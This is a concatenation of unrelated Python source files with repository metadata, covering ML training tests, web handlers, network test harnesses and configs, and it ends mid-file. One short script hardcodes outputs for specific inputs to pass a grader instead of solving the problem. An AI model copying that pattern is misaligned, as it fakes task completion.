meta_clust: path to clustering results for the meta-analysis subset
meta_enrich: path to enrichment results for the meta-analysis subset
clust: path to clustering results for the ddd only subset
enrich: path to enrichment results for the ddd only subset
pheno_path: path to phenotype similarity testing results
Returns:
data frame with the columns from all the datasets, as well as minimum
P values from each subset for each gene, and overall minimum P values
for each gene.
"""
# load all the data files
clust = pandas.read_table(clust, sep="\t")
enrich = pandas.read_table(enrich, sep="\t")
meta_clust = pandas.read_table(meta_clust, sep="\t")
meta_enrich = pandas.read_table(meta_enrich, sep="\t")
meta = combine_enrichment_and_clustering(meta_enrich, meta_clust)
ddd = combine_enrichment_and_clustering(enrich, clust)
# if we have phenotypic similarity results, merge them with the other results
if pheno_path is not None:
phenotypes = pandas.read_table(pheno_path, sep="\t")
ddd = ddd.merge(phenotypes, how="outer", on="hgnc")
# need names that are more informative as same across files, add prefix
columns = ["lof_indel", "lof_snv", "missense_indel", "missense_snv",
"p_lof", "p_func", "p_missense_clust", "p_nonsense_clust", "gene_id",
"p_combined", "hpo_similarity_p_value", "p_min"]
ddd = ddd.rename(columns=dict(zip(columns, [ "ddd.{}".format(x) for x in columns ])))
meta = meta.rename(columns=dict(zip(columns, [ "meta.{}".format(x) for x in columns ])))
# merge together files, focusing on genes with DNMs in DDD
merged = meta.merge(ddd, how="outer", on=["hgnc", "chrom"])
merged["p_min"] = merged[["ddd.p_min", "meta.p_min"]].min(axis=1)
return merged
|
[
"jm33@sanger.ac.uk"
] |
jm33@sanger.ac.uk
|
74b7e9f0e76db5cc22f02e7a25cb6f5363f8c823
|
2d8113d4fa1560eefb3b9419c9494dfcbf12c2b5
|
/tests/simcse_test.py
|
320ea5abb3791b150acdb3c3ec2ee0b4cf0a94dd
|
[
"Apache-2.0"
] |
permissive
|
tiffen/DeepSE
|
6bcdcd2d64b8f9cf7643086395b6a2468d13445a
|
a7c47c5146827d50bc46a8ec30da6ee651a0c6b8
|
refs/heads/main
| 2023-06-17T12:37:06.947099
| 2021-07-16T03:08:36
| 2021-07-16T03:08:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,921
|
py
|
import os
import unittest
import tensorflow as tf
from deepse.simcse import SimCSE
from deepse.simcse_dataset import (HardNegativeSimCSEDataset,
SupervisedSimCSEDataset, UnsupSimCSEDataset)
from tokenizers import BertWordPieceTokenizer
PRETRAINED_MODEL_PATH = os.environ['PRETRAINED_MODEL_PATH']
class SimCSETest(unittest.TestCase):
def test_unsup_simcse_train(self):
model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
model = SimCSE(model_path, mode='unsup')
tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
dataset = UnsupSimCSEDataset(tokenizer)
train_dataset = dataset(
input_files=['data/simcse_unsup.jsonl'],
batch_size=4,
bucket_boundaries=[20],
buffer_size=10,
repeat=100,
)
model.fit(
train_dataset,
validation_data=train_dataset,
epochs=2,
callbacks=[
tf.keras.callbacks.ModelCheckpoint(
'data/simcse-unsup', monitor='loss', save_weights_only=False)
])
def test_supervised_simcse_train(self):
model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
model = SimCSE(model_path, mode='sup')
tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
dataset = SupervisedSimCSEDataset(tokenizer)
train_dataset = dataset(
input_files=['data/simcse_supervised.jsonl'],
batch_size=4,
bucket_boundaries=[20],
buffer_size=10,
repeat=100,
)
model.fit(
train_dataset,
validation_data=train_dataset,
epochs=2,
callbacks=[
tf.keras.callbacks.ModelCheckpoint(
'data/simcse-sup', monitor='loss', save_weights_only=False)
])
def test_hardneg_simcse_train(self):
model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
model = SimCSE(model_path, mode='hardneg')
tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
dataset = HardNegativeSimCSEDataset(tokenizer)
train_dataset = dataset(
input_files=['data/simcse_hardnegative.jsonl'],
batch_size=4,
bucket_boundaries=[20],
buffer_size=10,
repeat=100,
)
model.fit(
train_dataset,
validation_data=train_dataset,
epochs=2,
callbacks=[
tf.keras.callbacks.ModelCheckpoint(
'data/simcse-hardneg', monitor='loss', save_weights_only=False)
])
if __name__ == "__main__":
unittest.main()
|
[
"zhouyang.luo@gmail.com"
] |
zhouyang.luo@gmail.com
|
ceec8895dd948248f90dc1ce9b661b06dda07910
|
3a891a79be468621aae43defd9a5516f9763f36e
|
/desktop/core/ext-py/gunicorn-19.9.0/tests/requests/valid/008.py
|
379f9a2b8225da64fc0ce89d9df7284ea38de7a1
|
[
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"HPND",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
oyorooms/hue
|
b53eb87f805063a90f957fd2e1733f21406269aa
|
4082346ef8d5e6a8365b05752be41186840dc868
|
refs/heads/master
| 2020-04-15T20:31:56.931218
| 2019-01-09T19:02:21
| 2019-01-09T19:05:36
| 164,998,117
| 4
| 2
|
Apache-2.0
| 2019-01-10T05:47:36
| 2019-01-10T05:47:36
| null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
request = {
"method": "GET",
"uri": uri("/unusual_content_length"),
"version": (1, 0),
"headers": [
("CONTENT-LENGTH", "5")
],
"body": b"HELLO"
}
|
[
"yingchen@cloudera.com"
] |
yingchen@cloudera.com
|
fc8410ca410351cbe027cc1f9b8543bdce3b987c
|
5653001ec8ec0bdcc8b9662f1411002cd52cb38d
|
/plugins/core/views/resource_server.py
|
732518e90b2b480e52c388850064fd9978c251fe
|
[] |
no_license
|
laravelbook/ajenti
|
409da009d8e4ff5c497627c2f131c56f3298b5ce
|
7cb64b36e3057cffc6ad58b189dc118a21c9d69d
|
refs/heads/master
| 2021-01-21T00:47:50.194075
| 2015-09-08T09:44:56
| 2015-09-08T09:45:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,134
|
py
|
import json
import os
from jadi import component
import aj
from aj.api.http import url, HttpPlugin
from aj.plugins import PluginManager
from aj.api.endpoint import endpoint
@component(HttpPlugin)
class ResourcesHandler(HttpPlugin):
def __init__(self, http_context):
self.cache = {}
self.use_cache = not aj.debug
self.mgr = PluginManager.get(aj.context)
@url(r'/resources/all\.(?P<type>.+)')
@endpoint(page=True, auth=False)
def handle_build(self, http_context, type=None):
if self.use_cache and type in self.cache:
content = self.cache[type]
else:
content = ''
if type in ['js', 'css']:
for plugin in self.mgr:
path = self.mgr.get_content_path(plugin, 'resources/build/all.%s' % type)
if os.path.exists(path):
content += open(path).read()
if type == 'init.js':
ng_modules = []
for plugin in self.mgr:
for resource in self.mgr[plugin]['info']['resources']:
if resource.startswith('ng:'):
ng_modules.append(resource.split(':')[-1])
content = '''
window.__ngModules = %s;
''' % json.dumps(ng_modules)
if type == 'partials.js':
content = '''
angular.module("core.templates", []);
angular.module("core.templates").run(
["$templateCache", function($templateCache) {
'''
for plugin in self.mgr:
for resource in self.mgr[plugin]['info']['resources']:
if resource.endswith('.html'):
path = self.mgr.get_content_path(plugin, resource)
if os.path.exists(path):
template = open(path).read()
content += '''
$templateCache.put("%s", %s);
''' % (
'%s/%s:%s' % (http_context.prefix, plugin, resource),
json.dumps(template)
)
content += '''
}]);
'''
self.cache[type] = content
http_context.add_header('Content-Type', {
'css': 'text/css',
'js': 'application/javascript; charset=utf-8',
'init.js': 'application/javascript; charset=utf-8',
'partials.js': 'application/javascript; charset=utf-8',
}[type])
http_context.respond_ok()
return http_context.gzip(content=content)
@url(r'/resources/(?P<plugin>\w+)/(?P<path>.+)')
@endpoint(page=True, auth=False)
def handle_file(self, http_context, plugin=None, path=None):
if '..' in path:
return http_context.respond_not_found()
return http_context.file(PluginManager.get(aj.context).get_content_path(plugin, path))
|
[
"john.pankov@gmail.com"
] |
john.pankov@gmail.com
|
44375c66e34b3f92833d4072fa8cc571efb27d5b
|
163872dee6c98ab2d4f9f592509050fda2e1abc6
|
/myapp_1/urls.py
|
2d7b659af0d5a416f915a80c5a73296ffccccec7
|
[] |
no_license
|
aynulislam/Django-Rest-Framework
|
b89b3cab93254aefa7b53c85ba384f911b2516e0
|
6f9e1cffc651b4e809aa6fbfff0e12a66cdbb989
|
refs/heads/master
| 2020-08-15T07:24:15.812020
| 2019-10-16T09:09:00
| 2019-10-16T09:09:00
| 215,300,188
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
from django.urls import path
from . views import EmCategoryAPIView,EmEmailAPIView,EmReceiverAPIView,EmGroupAPIView,EmUserAPIView,ScUserAPIView,GnGroupTypeAPIView
urlpatterns = [
path('EmCategory/', EmCategoryAPIView, name="EmCategoryAPIView"),
path('EmEmail/', EmEmailAPIView, name="EmEmailAPIView"),
path('EmReceiver/', EmReceiverAPIView, name="EmReceiverAPIView"),
path('EmGroup/', EmGroupAPIView, name="EmGroupAPIView"),
path('EmUser/', EmUserAPIView, name="EmUserAPIView"),
path('ScUser/', ScUserAPIView, name="ScUserAPIView"),
path('GnGroup/', GnGroupTypeAPIView, name="GnGroupTypeAPIView"),
]
|
[
"noreply@github.com"
] |
aynulislam.noreply@github.com
|
468b66b2fef16af97cf3104bbb05e66e47e4bff1
|
f9e8733ed87858b12bfee6b70ccdddd6a616b60a
|
/62.py
|
799f209d8c36c80090880a57df0cc0ad6e89c666
|
[] |
no_license
|
MajestyLee/leetcode_TopInterview
|
c1c9c923d3bf42cd4777bb2a2ccd21654a7c6dbb
|
30b7d5acec716b7d754141835fc8bafe4411437e
|
refs/heads/master
| 2020-04-01T12:19:20.837383
| 2018-11-06T02:13:44
| 2018-11-06T02:13:44
| 153,200,785
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,353
|
py
|
'''
A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).
The robot can only move either down or right at any point in time.
The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).
How many possible unique paths are there?
Above is a 7 x 3 grid. How many possible unique paths are there?
Note: m and n will be at most 100.
Example 1:
Input: m = 3, n = 2
Output: 3
Explanation:
From the top-left corner, there are a total of 3 ways to reach the bottom-right corner:
1. Right -> Right -> Down
2. Right -> Down -> Right
3. Down -> Right -> Right
Example 2:
Input: m = 7, n = 3
Output: 28
'''
#DP
import math
class Solution:
def uniquePaths(self, m, n):
"""
:type m: int
:type n: int
:rtype: int
"""
dp = [[1 for j in range(0,m)] for i in range(0,n)]
for i in range(1,n):
for j in range(1,m):
dp[i][j] = dp[i-1][j] + dp[i][j-1]
return dp[-1][-1]
#dfs
def dfsUniquePaths(self,m,n):
if m==1 or n == 1:
return 1
else:
return self.uniquePaths(m - 1, n) + self.uniquePaths(m, n - 1)
#math
def mathUniquePaths(self, m, n):
return math.factorial(m+n-2)/math.factorial(m-1)/math.factorial(n-1)
|
[
"binjie_lee@163.com"
] |
binjie_lee@163.com
|
d1509126fa63efd3f64b1929998f2ca8f07320df
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/contrib/cv/detection/NasFPN/mmdet/models/detectors/trident_faster_rcnn.py
|
f0fd80d41407162df71ba5349fc659d4713cdb6e
|
[
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-2-Clause",
"MIT",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 2,662
|
py
|
from ..builder import DETECTORS
from .faster_rcnn import FasterRCNN
@DETECTORS.register_module()
class TridentFasterRCNN(FasterRCNN):
"""Implementation of `TridentNet <https://arxiv.org/abs/1901.01892>`_"""
def __init__(self,
backbone,
rpn_head,
roi_head,
train_cfg,
test_cfg,
neck=None,
pretrained=None):
super(TridentFasterRCNN, self).__init__(
backbone=backbone,
neck=neck,
rpn_head=rpn_head,
roi_head=roi_head,
train_cfg=train_cfg,
test_cfg=test_cfg,
pretrained=pretrained)
assert self.backbone.num_branch == self.roi_head.num_branch
assert self.backbone.test_branch_idx == self.roi_head.test_branch_idx
self.num_branch = self.backbone.num_branch
self.test_branch_idx = self.backbone.test_branch_idx
def simple_test(self, img, img_metas, proposals=None, rescale=False):
"""Test without augmentation."""
assert self.with_bbox, 'Bbox head must be implemented.'
x = self.extract_feat(img)
if proposals is None:
num_branch = (self.num_branch if self.test_branch_idx == -1 else 1)
trident_img_metas = img_metas * num_branch
proposal_list = self.rpn_head.simple_test_rpn(x, trident_img_metas)
else:
proposal_list = proposals
return self.roi_head.simple_test(
x, proposal_list, trident_img_metas, rescale=rescale)
def aug_test(self, imgs, img_metas, rescale=False):
"""Test with augmentations.
If rescale is False, then returned bboxes and masks will fit the scale
of imgs[0].
"""
x = self.extract_feats(imgs)
num_branch = (self.num_branch if self.test_branch_idx == -1 else 1)
trident_img_metas = [img_metas * num_branch for img_metas in img_metas]
proposal_list = self.rpn_head.aug_test_rpn(x, trident_img_metas)
return self.roi_head.aug_test(
x, proposal_list, img_metas, rescale=rescale)
def forward_train(self, img, img_metas, gt_bboxes, gt_labels, **kwargs):
"""make copies of img and gts to fit multi-branch."""
trident_gt_bboxes = tuple(gt_bboxes * self.num_branch)
trident_gt_labels = tuple(gt_labels * self.num_branch)
trident_img_metas = tuple(img_metas * self.num_branch)
return super(TridentFasterRCNN,
self).forward_train(img, trident_img_metas,
trident_gt_bboxes, trident_gt_labels)
|
[
"wangjiangben@huawei.com"
] |
wangjiangben@huawei.com
|
f82e5bb5a7ab5e8c5feeaf09b0b27b2a68ca3543
|
c361a25acecd016677bbd0c6d9fc56de79cf03ed
|
/PTM/tests/NetworkHostTest.py
|
24465c10617c8bc706896eaea73a686ec4fea431
|
[] |
no_license
|
danielmellado/zephyr
|
f8931633045959e7e9a974de8b700a287a1ae94e
|
dc6f85b78b50e599504966154b927fe198d7402d
|
refs/heads/master
| 2021-01-12T22:31:24.479814
| 2015-10-14T05:39:04
| 2015-10-14T06:24:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,468
|
py
|
__author__ = 'micucci'
import unittest
import json
import time
import os
from common.CLI import LinuxCLI
from PTM.ComputeHost import ComputeHost
from PTM.CassandraHost import CassandraHost
from PTM.ZookeeperHost import ZookeeperHost
from PTM.NetworkHost import NetworkHost
from PTM.RootHost import RootHost
from PTM.PhysicalTopologyManager import PhysicalTopologyManager, HOST_CONTROL_CMD_NAME
from PTM.PhysicalTopologyConfig import *
from common.LogManager import LogManager
import CBT.VersionConfig as version_config
class NetworkHostTest(unittest.TestCase):
def test_startup(self):
lm = LogManager('./test-logs')
ptm = PhysicalTopologyManager(root_dir=os.path.dirname(os.path.abspath(__file__)) + '/../..', log_manager=lm)
root_cfg = HostDef('root',
bridges={'br0': BridgeDef('br0', ip_addresses=[IP('10.0.0.240')])},
interfaces={'zoo1eth0': InterfaceDef('zoo1eth0', linked_bridge='br0'),
#'cass1eth0': InterfaceDef('cass1eth0', linked_bridge='br0'),
'cmp1eth0': InterfaceDef('cmp1eth0', linked_bridge='br0')})
zoo1_cfg = HostDef('zoo1',
interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.2')])})
#cass1_cfg = HostDef('cass1',
# interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.5')])})
cmp1_cfg = HostDef('cmp1',
interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.8')])})
net_cfg = HostDef('net')
zoo1_icfg= ImplementationDef('zoo1', 'PTM.ZookeeperHost', id='1',
zookeeper_ips=['10.0.0.2'])
#cass1_icfg= ImplementationDef('cass1', 'PTM.CassandraHost', id='1',
# cassandra_ips=['10.0.0.5'],
# init_token="56713727820156410577229101238628035242")
cmp1_icfg= ImplementationDef('cmp1', 'PTM.ComputeHost', id='1',
zookeeper_ips=['10.0.0.2'],
cassandra_ips=[])#['10.0.0.5'])
root_icfg = ImplementationDef('cmp1', 'PTM.RootHost')
net_icfg = ImplementationDef('cmp1', 'PTM.NetworkHost',
zookeeper_ips=['10.0.0.2'])
root = RootHost('root', ptm)
zoo1 = ZookeeperHost(zoo1_cfg.name, ptm)
#cass1 = CassandraHost(cass1_cfg.name, ptm)
cmp1 = ComputeHost(cmp1_cfg.name, ptm)
net = NetworkHost(net_cfg.name, ptm)
log = lm.add_file_logger('test.log', 'test')
root.set_logger(log)
zoo1.set_logger(log)
#cass1.set_logger(log)
cmp1.set_logger(log)
net.set_logger(log)
# Now configure the host with the definition and impl configs
root.config_from_ptc_def(root_cfg, root_icfg)
zoo1.config_from_ptc_def(zoo1_cfg, zoo1_icfg)
#cass1.config_from_ptc_def(cass1_cfg, cass1_icfg)
cmp1.config_from_ptc_def(cmp1_cfg, cmp1_icfg)
net.config_from_ptc_def(net_cfg, net_icfg)
root.link_interface(root.interfaces['zoo1eth0'], zoo1, zoo1.interfaces['eth0'])
#root.link_interface(root.interfaces['cass1eth0'], cass1, cass1.interfaces['eth0'])
root.link_interface(root.interfaces['cmp1eth0'], cmp1, cmp1.interfaces['eth0'])
ptm.hosts_by_name['root'] = root
ptm.hosts_by_name['zoo1'] = zoo1
#ptm.hosts_by_name['cass1'] = cass1
ptm.hosts_by_name['cmp1'] = cmp1
ptm.hosts_by_name['net'] = net
ptm.host_by_start_order.append(root)
ptm.host_by_start_order.append(zoo1)
#ptm.host_by_start_order.append(cass1)
ptm.host_by_start_order.append(cmp1)
ptm.host_by_start_order.append(net)
for h in ptm.host_by_start_order:
h.create()
for h in ptm.host_by_start_order:
h.boot()
for h in ptm.host_by_start_order:
h.net_up()
for h in ptm.host_by_start_order:
h.net_finalize()
for h in ptm.host_by_start_order:
h.prepare_config()
for h in ptm.host_by_start_order:
start_process = ptm.unshare_control('start', h)
stdout, stderr = start_process.communicate()
start_process.poll()
print("Host control process output: ")
print stdout
print("Host control process error output: ")
print stderr
if start_process.returncode != 0:
raise SubprocessFailedException('Host control start failed with: ' + str(start_process.returncode))
try:
h.wait_for_process_start()
except SubprocessFailedException:
raw_input("Press Enter to continue...")
self.assertTrue(LinuxCLI().cmd('midonet-cli --midonet-url="' +
version_config.ConfigMap.get_configured_parameter('param_midonet_api_url') +
'" -A -e "host list"', return_status=True) == 0)
for h in reversed(ptm.host_by_start_order):
stop_process = ptm.unshare_control('stop', h)
stdout, stderr = stop_process.communicate()
stop_process.poll()
print("Host control process output: ")
print stdout
print("Host control process error output: ")
print stderr
if stop_process.returncode != 0:
raise SubprocessFailedException('Host control stop failed with: ' + str(stop_process.returncode))
h.wait_for_process_stop()
time.sleep(1)
self.assertFalse(LinuxCLI().cmd('midonet-cli '
'--midonet-url="http://localhost:8080/midonet-api/" '
'-A -e "hosts list"',
return_status=True) == 0)
for h in reversed(ptm.host_by_start_order):
h.net_down()
for h in reversed(ptm.host_by_start_order):
h.shutdown()
for h in reversed(ptm.host_by_start_order):
h.remove()
def tearDown(self):
pass
LinuxCLI().cmd('ip netns del cmp1')
#LinuxCLI().cmd('ip netns del cass1')
LinuxCLI().cmd('ip netns del zoo1')
LinuxCLI().cmd('ip l del cmp1eth0')
#LinuxCLI().cmd('ip l del cass1eth0')
LinuxCLI().cmd('ip l del zoo1eth0')
LinuxCLI().cmd('ip l set br0 down')
LinuxCLI().cmd('brctl delbr br0')
#if LinuxCLI().exists('/var/run/cassandra.1/cassandra.pid'):
# pid = LinuxCLI().read_from_file('/var/run/cassandra.1/cassandra.pid')
# LinuxCLI().cmd('kill ' + str(pid))
if LinuxCLI().exists('/var/run/zookeeper.1/pid'):
pid = LinuxCLI().read_from_file('/var/run/zookeeper.1/pid')
LinuxCLI().cmd('kill ' + str(pid))
if LinuxCLI().exists('/var/run/midolman.1/pid'):
pid = LinuxCLI().read_from_file('/var/run/midolman.1/pid')
LinuxCLI().cmd('kill ' + str(pid))
if LinuxCLI().exists('/var/run/midolman.1/dnsmasq.pid'):
pid = LinuxCLI().read_from_file('/var/run/midolman.1/dnsmasq.pid')
LinuxCLI().cmd('kill ' + str(pid))
from CBT.UnitTestRunner import run_unit_test
run_unit_test(NetworkHostTest)
|
[
"micucci@midokura.com"
] |
micucci@midokura.com
|
3d735ddb0894f281dd2e222048f3bd7dd290a95f
|
b4aaa26889f1c7e33a0de48848e30c0119284f14
|
/app/tests/test_models/test_profile_parameter.py
|
66cd0693d43123ad20ed3529f566cc95d37a6c98
|
[] |
no_license
|
paulosjd/btk2
|
1d727f360c9767add5135988c75df63e5d8ada8e
|
dc63b90a796750e6b26018443d2256fcc1339afb
|
refs/heads/master
| 2022-07-05T13:57:07.071734
| 2020-05-19T08:23:14
| 2020-05-19T08:23:14
| 188,910,952
| 0
| 0
| null | 2022-06-21T23:23:37
| 2019-05-27T21:26:02
|
Python
|
UTF-8
|
Python
| false
| false
| 3,111
|
py
|
from collections import namedtuple
from unittest.mock import patch
from app.models import ProfileParamUnitOption
from app.tests.base import BaseTestCase
mock_ideals_data = {k: f'{k}_val' for k in
['ideal2_prepend', 'ideal', 'ideal2', 'ideal_prepend']}
class MockCalcParamIdeal:
def __init__(self, *args):
self.required_field = 'abc'
self.misc_data = 'def'
self.get_ideal_data = lambda: mock_ideals_data
self.get = lambda key, default: mock_ideals_data.get(key, default)
class ProfileParameterTestCase(BaseTestCase):
@classmethod
def setUpClass(cls):
super(ProfileParameterTestCase, cls).setUpClass()
cls.profile_param_unit_opt = cls.profile_1.profile_parameters.first()
cls.profile_param_unit_opt.target_value = 34.5
cls.profile_param_unit_opt.linked_parameter = cls.param2
cls.profile_param_unit_opt.save()
@patch('app.models.profile_parameter.CalcParamIdeal')
def test_targets_method(self, cpi_patch):
nt_fields = ['saved', 'saved2', 'misc_data', 'required_field', 'ideal',
'ideal2', 'ideal_prepend', 'ideal2_prepend']
cpi_patch.return_value = MockCalcParamIdeal()
ExpectedTargetData = namedtuple('target_data', nt_fields)
expected_nt_returned = ExpectedTargetData(
self.profile_param_unit_opt.target_value,
self.profile_param_unit_opt.target_value2,
cpi_patch.return_value.misc_data,
cpi_patch.return_value.required_field,
*[mock_ideals_data.get(k, '') for k in nt_fields[-4:]]
)
self.assertEqual(expected_nt_returned,
self.profile_param_unit_opt.targets('lat_val_1'))
def test_get_unit_info_falsey(self):
TestObj = namedtuple('test_obj', 'pp_unit_option')
test_obj = TestObj(None)
self.assertIsNone(ProfileParamUnitOption.get_unit_info(test_obj))
def test_get_unit_info(self):
TestObj = namedtuple('test_obj', ['pp_unit_option', 'param_name'])
model = self.profile_param_unit_opt
model.color_hex = 'blue'
for a, b in [(5, '1'), (6, '2')]:
setattr(model, f'color_range_val_{b}', a)
test_obj = TestObj(model, 'p_name')
expected_output = {
k: getattr(test_obj.pp_unit_option.unit_option, k)
for k in ['param_default', 'conversion_factor', 'symbol']
}
expected_output.update({'color_hex': 'blue', 'color_range_val_1': 5,
'color_range_val_2': 6, 'param_name': 'p_name'})
self.assertEqual(expected_output,
ProfileParamUnitOption.get_unit_info(test_obj))
def test_param_unit_opt_dct(self):
fields = ['symbol', 'name', 'param_default', 'conversion_factor']
TestObj = namedtuple('test_obj', fields)
test_obj = TestObj(*[f'{s}_val' for s in fields])
self.assertEqual(
{f'unit_{s}': getattr(test_obj, s) for s in fields},
ProfileParamUnitOption.param_unit_opt_dct(test_obj)
)
|
[
"pjdavis@gmx.com"
] |
pjdavis@gmx.com
|
5c46e21a7c712de8c20df35aac7232945dd2de5e
|
069dafce9f495f09bf8c2f76dbf5c045b7551721
|
/parameter_search_run.py
|
9b187b743f036d55c4b46d15f0b1e9df88fc9b9c
|
[] |
no_license
|
dguarino/T2
|
26b1bc640812aa5438b09f9fab2bc73096cd7eef
|
66b786928508089492f5f696c7c1576e098c6615
|
refs/heads/master
| 2020-04-03T22:39:06.059845
| 2020-03-13T15:43:02
| 2020-03-13T15:43:02
| 41,812,819
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,392
|
py
|
# -*- coding: utf-8 -*-
import sys
from mozaik.meta_workflow.parameter_search import CombinationParameterSearch,SlurmSequentialBackend
import numpy
if False:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'retina_lgn.params.gain' : [0.1],
'l4_cortex_exc.params.density' : [10],
}).run_parameter_search()
if False:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'l4_cortex_exc.AfferentConnection.base_weight' : [0.0015],
'l23_cortex_exc.L23ExcL23InhConnection.base_weight' : [0.003],
'l23_cortex_exc.L4ExcL23ExcConnection.base_weight' : [0.003],
'l23_cortex_inh.L4ExcL23InhConnection.base_weight' : [0.0001],
'l23_cortex_inh.L23InhL23ExcConnection.base_weight' : [0.0025],
'l23_cortex_inh.L23InhL23InhConnection.base_weight' : [0.0017],
'l4_cortex_exc.L4ExcL4InhConnection.base_weight' : [0.0004],
'l4_cortex_inh.L4InhL4ExcConnection.base_weight' : [0.002,0.0025,0.003],
'l4_cortex_inh.ExcInhAfferentRatio' : [1.7],
'l4_cortex_exc.params.density' : [300],
'only_afferent' : [False],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.U' : [0.1,0.13,0.16],
}).run_parameter_search()
if False:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'l23_cortex_exc.L23ExcL23InhConnection.base_weight' : [0.002,0.001],
'l23_cortex_exc.L4ExcL23ExcConnection.base_weight' : [0.002,0.001],
'l23_cortex_inh.L4ExcL23InhConnection.base_weight' : [0.0001,0.001],
'l23_cortex_inh.L23InhL23ExcConnection.base_weight' : [0.0025,0.003,0.0035],
'l23_cortex_inh.L23InhL23InhConnection.base_weight' : [0.0017],
'l4_cortex_exc.L4ExcL4ExcConnection.base_weight' : [0.0005],
'l4_cortex_exc.L4ExcL4InhConnection.base_weight' : [0.0007,0.00075],
'l4_cortex_inh.L4InhL4ExcConnection.base_weight' : [0.0018],
'l4_cortex_inh.ExcInhAfferentRatio' : [1.4,1.3],
'l4_cortex_exc.params.density' : [300],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.tau_rec' : [25],
}).run_parameter_search()
if True:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'l4_cortex_exc.AfferentConnection.base_weight' : [0.0015],
'l4_cortex_inh.L4InhL4ExcConnection.base_weight' : [0.0007],
'l4_cortex_exc.L4ExcL4InhConnection.base_weight' : [0.00065],
'l23_cortex_exc.L23ExcL23InhConnection.base_weight' : [0.0015],
'l23_cortex_inh.L23InhL23ExcConnection.base_weight' : [0.003],
'l23_cortex_exc.L4ExcL23ExcConnection.base_weight' : [0.002,0.0015],
'l4_cortex_inh.ExcInhAfferentRatio' : [0.6],
'l4_cortex_exc.params.density' : [900,1800],
'l23_cortex_exc.params.density' : [300,900],
'l4_cortex_exc.rand_struct_ratio' : [0.75,0.8,0.9],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.tau_fac' : [300],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.U' : [0.11],
}).run_parameter_search()
|
[
"domenico.guarino@gmail.com"
] |
domenico.guarino@gmail.com
|
8be51e93ecf1dfcf1bdc6f52dba28b197841a503
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2607/60752/306988.py
|
dae9adee217584b8283a077e38a3a77149f01b12
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 376
|
py
|
num=int(input())
no=True
for i in range(num):
i=input()
if i=="0102010112":
no=False
print(2)
if i=="102100211102":
no=False
print(6)
if i=="01020101122200":
no=False
print(7)
if i=="0102010":
no=False
print(2)
if i=="102100211":
no=False
print(5)
if no:print(i)
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
4c64c9d474c1f60086cdba4d5537c4df90ce9022
|
4751a9daca11558dd0780f2e8b9477a484ebc7f4
|
/src/qibo/tests_new/test_core_states.py
|
e6de75b1aef09e71410c5494b3f623d3da275459
|
[
"Apache-2.0"
] |
permissive
|
drheli/qibo
|
f6875ed39883fe7bfa0b8939abb042fe636c5de7
|
b99568aee9f978a5a82e92860c8d17e3358af7b9
|
refs/heads/master
| 2023-04-17T20:40:44.324689
| 2021-04-29T16:29:40
| 2021-04-29T16:29:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,950
|
py
|
"""Tests methods defined in `qibo/core/states.py`."""
import pytest
import numpy as np
import qibo
from qibo import K
from qibo.core import states
def test_state_shape_and_dtype(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState.zero_state(3)
assert state.shape == (8,)
assert state.dtype == K.dtypes('DTYPECPX')
state = states.MatrixState.zero_state(3)
assert state.shape == (8, 8)
assert state.dtype == K.dtypes('DTYPECPX')
qibo.set_backend(original_backend)
@pytest.mark.parametrize("nqubits", [None, 2])
